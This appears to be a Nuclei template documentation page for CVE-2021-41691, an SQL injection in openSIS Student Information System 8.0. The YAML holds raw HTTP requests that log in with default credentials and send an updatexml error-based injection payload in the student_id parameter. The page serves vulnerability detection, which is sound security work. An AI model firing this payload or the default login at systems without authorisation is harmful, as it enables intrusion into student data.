Skip to content
Nuclei Templates

openSIS Student Information System 8.0 SQL Injection

ID: CVE-2021-41691

Severity: high

Author: Bartu Utku SARP

Tags: cve,cve2021,sqli,auth,edb,opensis

Description

Section titled “Description”

openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.

YAML Source

Section titled “YAML Source”
id: CVE-2021-41691


info:
  name: openSIS Student Information System 8.0 SQL Injection
  author: Bartu Utku SARP
  severity: high
  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
  reference:
    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
    - https://www.exploit-db.com/exploits/50637
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
  classification:
    cve-id: CVE-2021-41691
  metadata:
    max-request: 2
  tags: cve,cve2021,sqli,auth,edb,opensis
variables:
  num: "999999999"


http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded


        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
      - |
        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded


        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5


    attack: pitchfork
    payloads:
      username:
        - student
      password:
        - student@123
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100a9cd9674cd3097329efddf0844679b0398ccad6ea9ef11e29c96b29b4fc06690022057fded33d05f5b642f2558396246323ef8e2cd57615364deffdd351902645d69:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41691.yaml"

View on Github